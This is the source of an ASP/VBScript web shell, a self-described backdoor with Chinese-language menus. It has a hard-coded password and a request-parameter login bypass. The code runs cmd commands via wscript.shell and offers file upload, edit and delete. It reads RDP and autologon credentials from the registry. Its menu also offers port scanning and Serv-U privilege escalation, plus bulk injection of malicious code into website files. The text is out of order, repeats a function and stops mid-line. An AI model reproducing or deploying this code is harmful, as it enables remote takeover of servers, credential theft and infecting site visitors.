(lcase(ftype),ftype3)<>0 then
select case m
case "1"
if checkbox<>"checked" then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.write
rrs"√
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
set
tfile1=fs1.opentextfile(wpath&""&myfile.name,1,-2)
if instr
(tfile1.readall,wcode)=0 then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.write
rrs"×
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile1.close
end if
else
rrs"<font
color=red>×</font> "&wpath&myfile.name
tfile1.close
end if
set tfile1=nothing
end if
case "2"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,"")
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case "3"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,addcode2)
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case else
rrs"大哥,别乱来.":response.end
end select
else
rrs"× "&wpath&myfile.name
end if
rrs " → <a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""downfile"")' class='am' title='下
载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""editfile"")' class='am' title='编
辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""copyfile"")' class='am' title='复
制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""movefile"")' class='am' title='移
动'>移动</a><br>"
next
set fsubfolers = f.subfolders
for each f1 in fsubfolers
newpath=wpath&""&f1.name
insertallfiles newpath,wcode,pc
next
set tfile=nothing
set fso = nothing
set tfile=nothing
set tfile2=nothing
set wfso = nothing
end sub
case "readreg":call readreg()
case "show1file":set abc=new lbf:abc.show1file(session
("folderpath")):set abc=nothing
case "downfile":downfile fname:showerr()
case "delfile":set abc=new lbf:abc.delfile(fname):set abc=nothing
case "editfile":set abc=new lbf:abc.editfile(fname):set abc=nothing
case "copyfile":set abc=new lbf:abc.copyfile(fname):set abc=nothing
case "movefile":set abc=new lbf:abc.movefile(fname):set abc=nothing
case "delfolder":set abc=new lbf:abc.delfolder(fname):set abc=nothing
case "copyfolder":set abc=new lbf:abc.copyfolder(fname):set
abc=nothing
case "movefolder":set abc=new lbf:abc.movefolder(fname):set
abc=nothing
case "newfolder":set abc=new lbf:abc.newfolder(fname):set abc=nothing
case "upfile":upfile()
case "cmd1shell":cmd1shell()
case "logout":session.contents.remove("web2a2dmin"):response.redirect
url
case "dbmanager":dbmanager()
case "course":course()
case "serverinfo":serverinfo()
case else mainform()
end select
if action<>"servu" then showerr()
rrs"</body></html>"
%>
server.scripttimeout=999999999
response.buffer =true
on error resume next
userpass="643617" '密码
mname="by:.尐飛" '后门名字
copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权
server.scripttimeout=999999999
response.buffer =true
on error resume next
sub showerr()
if err then
rrs"<br><a href='javascript:history.back()'><br> " &
err.description & "</a><br>"
err.clear:response.flush
end if
end sub
sub rrs(str)
response.write(str)
end sub
function repath(s)
repath=replace(s,"\","\\")
end function
function rrepath(s)
rrepath=replace(s,"\\","\")
end function
url=request.servervariables("url")
serverip=request.servervariables("local_addr")
action=request("action")
rootpath=server.mappath(".")
wwwroot=server.mappath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
folderpath=request("folderpath")
fname=request("fname")
backurl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
rrs"<html><meta http-equiv=""content-type"" content=""text/html;
charset=gb2312"">"
rrs"<title>"&mname1&" - "&serverip&" </title>"
rrs"<style type=""text/css"">"
rrs"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
rrs"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
rrs".c{background-color:#000000;border:0px}"
rrs".cmd{background-color:#000;color:#fff}"
rrs"body{margin: 0px;margin-left:4px;}"
rrs"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
rrs".am{color:#888;font-size:11px;}"
rrs"</style>"
rrs"<script language=javascript>function killerrors(){return true;}
window.onerror=killerrors;"
rrs"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
rrs"function runclock(){thetime = window.settimeout(""runclock()"",
100);var today = new date();var display= today.tolocalestring
();window.status=""→"&ad&" --""+display;}runclock();"
rrs"function showfolder(folder){top.addrform.folderpath.value =
folder;top.addrform.submit();}"
rrs"function fullform(fname,faction){top.hideform.fname.value =
fname;if(faction==""copyfile""){dname = prompt(""请输入复制到目标文件全
名称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefile""){dname = prompt(""请输入移动到目标文件全名
称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""copyfolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""newfolder""){dname = prompt(""请输入要新建的文件夹全名
称"",fname);top.hideform.fname.value = dname;}else{dname = ""other"";}
if(dname!=null){top.hideform.action.value =
faction;top.hideform.submit();}else{top.hideform.fname.value = """";}}"
rrs"</script>"
rrs "<body"
if action="" then rrs " scroll=no"
rrs ">"
dim obt(13,2)
obt(0,0) = "scripting.filesystemobject"
obt(0,2) = "文件操作组件"
obt(1,0) = "wscript.shell"
obt(1,2) = "命令行执行组件"
obt(2,0) = "adox.catalog"
obt(2,2) = "access建库组件"
obt(3,0) = "jro.jetengine"
obt(3,2) = "access压缩组件"
obt(4,0) = "scripting.dictionary"
obt(4,2) = "数据流上传辅助组件"
obt(5,0) = "adodb.connection"
obt(5,2) = "数据库连接组件"
obt(6,0) = "adodb.stream"
obt(6,2) = "数据流上传组件"
obt(7,0) = "softartisans.fileup"
obt(7,2) = "sa-fileup 文件上传组件"
obt(8,0) = "lyfupload.uploadfile"
obt(8,2) = "刘云峰文件上传组件"
obt(9,0) = "persits.upload.1"
obt(9,2) = "aspupload 文件上传组件"
obt(10,0) = "jmail.smtpmail"
obt(10,2) = "jmail 邮件收发组件"
obt(11,0) = "cdonts.newmail"
obt(11,2) = "虚拟smtp发信组件"
obt(12,0) = "smtpmail.smtpmail.1"
obt(12,2) = "smtpmail发信组件"
obt(13,0) = "microsoft.xmlhttp"
obt(13,2) = "数据传输组件"
for i=0 to 13
set t=server.createobject(obt(i,0))
if -2147221005 <> err then
isobj=" √"
else
isobj=" ×"
err.clear
end if
set t=nothing
obt(i,1)=isobj
next
if folderpath<>"" then
session("folderpath")=rrepath(folderpath)
end if
if session("folderpath")="" then
folderpath=rootpath
session("folderpath")=folderpath
end if
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
if request("web")="admin" then
session("web2a2dmin") = userpass
url()
end if
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
function mainmenu()
rrs"<table width='100%' cellspacing='0' cellpadding='0'>"
rrs"<tr><td height='5'></td></tr>"
rrs"<tr><td><center><a href='"&siteurl2&"' target='_blank'><font
color=red>"&mname2&"</font></center></a><hr hight=1 width='100%'>"
rrs"</td></tr>"
if obt(0,1)=" ×" then
rrs"<tr><td height='24'>无权限</td></tr>"
else
rrs"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
set abc=new lbf:rrs abc.showdriver():set abc=nothing
rrs"</div></td></tr><tr><td height='20'><a href='javascript:showfolder
("""&repath(wwwroot)&""")'>->站点根目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder("""&repath
(rootpath)&""")'>→本程序目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\program
files"")'>→program files</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\documents"")'>->documents</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\application data\\symantec\\pcanywhere"")'>-
>pcanywhere</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
end if
rrs"<tr><td height='22'><a href='?action=course' target='fileframe'>→
系统服务-用户账号</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=getterminalinfo'
target='fileframe'>→终端端口-自动登录</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=serverinfo'
target='fileframe'>→服务信息-组件支持</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cmd1shell' target='fileframe'>
→执行cmd命令</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=scanport' target='fileframe'>
→端口扫描器</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=servu' target='fileframe'>→
serv-u提权</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=readreg' target='fileframe'>→
读取注册表</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:fullform("""&repath
(session("folderpath")&"\newfolder")&""",""newfolder"")'>→新建目录
<hr></a></td></tr>"
rrs"<tr><td height='20'><a href='?action=editfile' target='fileframe'>
→新建文本</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=upfile' target='fileframe'>→
上传文件</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=kmuma' target='fileframe'>→查
找木马</b></a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=1' target='fileframe'>
→高级挂马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=2' target='fileframe'>
→批量清马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=3' target='fileframe'>
→批量替换</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=plgm' target='fileframe'></b>
→低级挂马</a></b></td></tr>"
rrs"<tr><td height='22'><a href='?action=logout' target='_top'>→退出登
录</a></td></tr>"
rrs"<tr><td align=center
style='color:red'><hr>"©right2&"</td></tr></table>"
rrs"</table>"
end function
sub unpack(thepath)
on error resume next
server.scripttimeout = 5000
dim rs, ws, str, conn, stream, connstr, thefolder
str = server.mappath(".") & "\"
set rs = createobject("adodb.recordset")
set stream = createobject("adodb.stream")
set conn = createobject("adodb.connection")
connstr = "provider=microsoft.jet.oledb.4.0;data
source=" & thepath & ";"
conn.open connstr
rs.open "filedata", conn, 1, 1
stream.open
stream.type = 1
do until rs.eof
thefolder = left(rs("thepath"), instrrev(rs
("thepath"), "\"))
if fsox.folderexists(str & thefolder) = false
then
createfolder(str & thefolder)
end if
stream.seteos()
stream.write rs("filecontent")
stream.savetofile str & rs("thepath"), 2
rs.movenext
loop
rs.close
conn.close
stream.close
set ws = nothing
set rs = nothing
set stream = nothing
set conn = nothing
end sub
sub createfolder(thepath)
dim i
i = instr(thepath, "\")
do while i > 0
if fsox.folderexists(left(thepath, i)) = false
then
fsox.createfolder(left(thepath, i - 1))
end if
if instr(mid(thepath, i + 1), "\") then
i = i + instr(mid(thepath, i + 1), "\")
else
i = 0
end if
loop
end sub
function course()
si="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getobject("winnt://.")
err.clear
if obj.starttype="" then
si=si&"<tr>"
si=si&"<td height=""20"" bgcolor=""#ffffff""> "
si=si&obj.name
si=si&"</td><td bgcolor=""#ffffff""> "
si=si&"系统用户(组)"
si=si&"</td></tr>"
si0="<tr><td height=""20"" bgcolor=""#ffffff""
colspan=""2""> </td></tr>"
end if
if obj.starttype=2 then lx="自动"
if obj.starttype=3 then lx="手动"
if obj.starttype=4 then lx="禁用"
if lcase(mid(obj.path,4,3))<>"win" and obj.starttype=2 then
si1=si1&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#ff0000> "&obj.path&"</font></td></tr>"
else
si2=si2&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399ff> "&obj.path&"</font></td></tr>"
end if
next
rrs si&si0&si1&si2&"</table>"
end function
function serverinfo()
si="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器名</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_name")&"</td></tr>"
si=si&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#ffffff'>服务器ip</td><td
bgcolor='#ffffff'> </td><td bgcolor='#ffffff'>"
si=si&"<input type='text' name='ip' size='15'
value='"&request.servervariables("local_addr")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器时间</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&now&" </td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器cpu数量</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("number_of_processors")
&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器操作系统</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("os")&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>web服务器版本</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_software")
&"</td></tr>"
for i=0 to 13
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>"&obt(i,0)&"</td><td bgcolor='#ffffff'>"&obt(i,1)
&"</td><td bgcolor='#ffffff' align=left>"&obt(i,2)&"</td></tr>"
next
rrs si
end function
function downfile(path)
response.clear
set osm = createobject(obt(6,0))
osm.open
osm.type = 1
osm.loadfromfile path
sz=instrrev(path,"\")+1
response.addheader "content-disposition", "attachment; filename=" &
mid(path,sz)
response.addheader "content-length", osm.size
response.charset = "utf-8"
response.contenttype = "application/octet-stream"
response.binarywrite osm.read
response.flush
osm.close
set osm = nothing
end function
function htmlencode(s)
if not isnull(s) then
s = replace(s, ">", ">")
s = replace(s, "<", "<")
s = replace(s, chr(39), "'")
s = replace(s, chr(34), """)
s = replace(s, chr(20), " ")
htmlencode = s
end if
end function
function upfile()
if request("action2")="post" then
set u=new upc : set f=u.ua("localfile")
uname=u.form("topath")
if uname="" or f.filesize=0 then
si="<br>请输入上传的完全路径后选择一个文件上传!"
else
f.saveas uname
if err.number=0 then
si="<center><br><br><br>文件"&uname&"上传成功!</center>"
end if
end if
set f=nothing:set u=nothing
si=si&backurl
rrs si
showerr()
response.end
end if
si="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
si=si&"<form name='upform' method='post' action='"&url&"?
action=upfile&action2=post' enctype='multipart/form-data'>"
si=si&"<tr><td>"
si=si&"上传路径:<input name='topath' value='"&rrepath(session
("folderpath")&"\diy3.asp")&"' size='40'>"
si=si&" <input name='localfile' type='file' size='25'>"
si=si&" <input type='submit' name='submit' value='上传'>"
si=si&"</td></tr></form></table>"
rrs si
end function
function cmd1shell()
checked=" checked"
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "diy3.asp"
if request("wscript")<>"yes" then checked=""
if request("cmd")<>"" then defcmd = request("cmd")
si="<form method='post'>"
si=si&"shell路径:<input name='sp' value='"&shellpath&"'
style='width:70%'> "
si=si&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">wscript.shell"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input
type='submit' value='执行'><textarea style='width:100%;height:440;'
class='cmd'>"
if request.form("cmd")<>"" then
if request.form("wscript")="yes" then
set cm=createobject(obt(1,0))
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&aaa
else
on error resume next
set ws=server.createobject("wscript.shell")
set ws=server.createobject("wscript.shell")
set fso=server.createobject("scripting.filesystemobject")
sztempfile = server.mappath("cmd.txt")
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set fs = createobject("scripting.filesystemobject")
set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&aaa
end if
end if
si=si&chr(13)&"</textarea></form>"
rrs si
end function
if session("web2a2dmin")<>userpass then
if request.form("pass")<>"" then
if request.form("pass")=userpass then
session("web2a2dmin")=userpass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>hack by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&siteurl&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"©right&"</center>"
if instr(si,sic)<>0 then rrs si
end if
response.end
end if
dim t1
class upc
dim d1,d2
public function form(f)
f=lcase(f)
if d1.exists(f) then:form=d1(f):else:form="":end if
end function
public function ua(f)
f=lcase(f)
if d2.exists(f) then:set ua=d2(f):else:set ua=new fif:end if
end function
private sub class_initialize
dim
tda,tst,vbcrlf,tin,diend,t2,tlen,tfl,sfv,fstart,fend,dstart,dend,upname
set d1=createobject(obt(4,0))
if request.totalbytes<1 then exit sub
set t1 = createobject(obt(6,0))
t1.type = 1 : t1.mode =3 : t1.open
t1.write request.binaryread(request.totalbytes)
t1.position=0 : tda =t1.read : dstart = 1
dend = lenb(tda)
set d2=createobject(obt(4,0))
vbcrlf = chrb(13) & chrb(10)
set t2 = createobject(obt(6,0))
tst = midb(tda,1, instrb(dstart,tda,vbcrlf)-1)
tlen = lenb (tst)
dstart=dstart+tlen+1
while (dstart + 10) < dend
diend = instrb(dstart,tda,vbcrlf & vbcrlf)+3
t2.type = 1 : t2.mode =3 : t2.open
t1.position = dstart
t1.copyto t2,diend-dstart
t2.position = 0 : t2.type = 2 : t2.charset ="gb2312"
tin = t2.readtext : t2.close
dstart = instrb(diend,tda,tst)
fstart = instr(22,tin,"name=""",1)+6
fend = instr(fstart,tin,"""",1)
upname = lcase(mid (tin,fstart,fend-fstart))
if instr (45,tin,"filename=""",1) > 0 then
set tfl=new fif
fstart = instr(fend,tin,"filename=""",1)+10
fend = instr(fstart,tin,"""",1)
fstart = instr(fend,tin,"content-type: ",1)+14
fend = instr(fstart,tin,vbcr)
tfl.filestart =diend
tfl.filesize = dstart -diend -3
if not d2.exists(upname) then
d2.add upname,tfl
end if
else
t2.type =1 : t2.mode =3 : t2.open
t1.position = diend : t1.copyto t2,dstart-diend-3
t2.position = 0 : t2.type = 2
t2.charset ="gb2312"
sfv = t2.readtext
t2.close
if d1.exists(upname) then
d1(upname)=d1(upname)&", "&sfv
else
d1.add upname,sfv
end if
end if
dstart=dstart+tlen+1
wend
tda=""
set t2 =nothing
end sub
private sub class_terminate
if request.totalbytes>0 then
d1.removeall:d2.removeall
set d1=nothing:set d2=nothing
t1.close:set t1 =nothing
end if
end sub
end class
class fif
dim filesize,filestart
private sub class_initialize
filesize = 0
filestart= 0
end sub
public function saveas(f)
dim t3
saveas=true
if trim(f)="" or filestart=0 then exit function
set t3=createobject(obt(6,0))
t3.mode=3 : t3.type=1 : t3.open
t1.position=filestart
t1.copyto t3,filesize
t3.savetofile f,2
t3.close
set t3=nothing
saveas=false
end function
end class
class lbf
dim cf
private sub class_initialize
set cf=createobject(obt(0,0))
end sub
private sub class_terminate
set cf=nothing
end sub
function showdriver()
for each d in cf.drives
rrs" <a href='javascript:showfolder
("""&d.driveletter&":\\"")'>本地磁盘 ("&d.driveletter&":)</a><br>"
next
end function
function show1file(path)
set fold=cf.getfolder(path)
i=0
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
for each f in fold.subfolders
si=si&"<td height=10>"
si=si&"<a href='javascript:showfolder("""&repath(path&"\"&f.name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&f.name&"</a>"
si=si&" _<a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""copyfolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
si=si&" <a href='javascript:fullform("""&replace
(path&"\"&f.name,"\","\\")&""",""delfolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""movefolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""downfile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
if i mod 3 = 0 then si=si&"</tr><tr>"
next
si=si&"</tr><tr><td height=2></td></tr></table>"
rrs si &"<hr noshade color=""#cccccc"" size=1 color=""#"" />" :
si=""
for each l in fold.files
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
si=si&"<tr style='boungroup-color:#'>"
si=si&"<td height='30'><a href='javascript:fullform("""&repath
(path&"\"&l.name)&""",""downfile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&l.name&"</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""editfile"")' class='am' title='编辑'>编辑</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""copyfile"")' class='am' title='复制'>复制</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""movefile"")' class='am' title='移动'>移动</a></td>"
si=si&"<td width='50' align=""center"">"&clng(l.size/1024)&"k</td>"
si=si&"<td width='200' align=""center"">"&l.type&"</td>"
si=si&"<td width='160'>"&l.datelastmodified&"</td>"
si=si&"</tr></table>"
rrs si:si=""
next
set fold=nothing
end function
function delfile(path)
if cf.fileexists(path) then
cf.deletefile path
si="<center><br><br><br>文件 "&path&" 删除成功!</center>"
si=si&backurl
rrs si
end if
end function
function editfile(path)
if request("action2")="post" then
set t=cf.createtextfile(path)
t.writeline request.form("content")
t.close
set t=nothing
si="<center><br><br><br>文件保存成功!</center>"
si=si&backurl
rrs si
response.end
end if
if path<>"" then
set t=cf.opentextfile(path, 1, false)
txt=htmlencode(t.readall)
t.close
set t=nothing
else
path=session("folderpath")&"\newfile.asp":txt="新建文件"
end if
si=si&"<form action='"&url&"?action2=post' method='post'
name='editform'>"
si=si&"<input name='action' value='editfile' type='hidden'>"
si=si&"<input name='fname' value='"&path&"' style='width:100%'><br>"
si=si&"<textarea name='content'
style='width:100%;height:450'>"&txt&"</textarea><br>"
si=si&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
rrs si
end function
function copyfile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.copyfile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
function movefile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.movefile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
function delfolder(path)
if cf.folderexists(path) then
cf.deletefolder path
si="<center><br><br><br>目录"&path&"删除成功!</center>"
si=si&backurl
rrs si
end if
end function
function copyfolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.copyfolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
function movefolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.movefolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
function newfolder(path)
if not cf.folderexists(path) and path<>"" then
cf.createfolder path
si="<center><br><br><br>目录"&path&"新建成功!</center>"
si=si&backurl
rrs si
end if
end function
end class
sub getterminalinfo()
on error resume next
set wsx = server.createobject("wscript.shell")
dim terminalportpath, terminalportkey, termport
dim autologinpath, autologinuserkey, autologinpasskey
dim isautologinenable, autologinenablekey, autologinusername,
autologinpassword
terminalportpath = "hklm\system\currentcontrolset\control\terminal
server\winstations\rdp-tcp\"
terminalportkey = "portnumber"
termport = wsx.regread(terminalportpath & terminalportkey)
rrs "终端服务端口及自动登录<hr/><ol>"
if termport = "" or err.number <> 0 then
rrs"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
else
rrs "当前终端服务端口: " & termport & "<br/>"
end if
autologinpath = "hkey_local_machine\software\microsoft\windows
nt\currentversion\winlogon\"
autologinenablekey = "autoadminlogon"
autologinuserkey = "defaultusername"
autologinpasskey = "defaultpassword"
isautologinenable = wsx.regread(autologinpath & autologinenablekey)
if isautologinenable = 0 then
rrs "系统自动登录功能未开启<br/>"
else
autologinusername = wsx.regread(autologinpath & autologinuserkey)
rrs "自动登录的系统帐户: " & autologinusername & "<br>"
autologinpassword = wsx.regread(autologinpath & autologinpasskey)
if err then
err.clear
rrs "false"
end if
rrs "自动登录的帐户密码: " & autologinpassword & "<br>"
end if
rrs "</ol>"
end sub
sub readreg()
rrs "注册表键值读取:<hr/>"
rrs "<form method=post>"
rrs "<input type=hidden value=readreg name=theact>"
rrs "<input name=thepath
value='hklm\system\currentcontrolset\control\computername\computername\
computername' size=80>"
rrs " <input type=submit value=' 读取 '>"
rrs "<span id=regeditinfo style='display:none;'><hr/>"
rrs "hklm\software\microsoft\windows\currentversion\winlogon\dont-
displaylastusername,reg_sz,1 {不显示上次登录用户}<br/>"
rrs
"hklm\system\currentcontrolset\control\lsa\restrictanonymous,reg_dword,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机ipc$共享
}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\autosha
reserver,reg_dword,0 {禁止默认共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\enables
harednetdrives,reg_sz,0 {关闭网络共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\enablesecurity
filters,reg_dword,1 {启用tcp/ip筛选(所有试配器)}<br/>"
rrs "hklm\system\controlset001
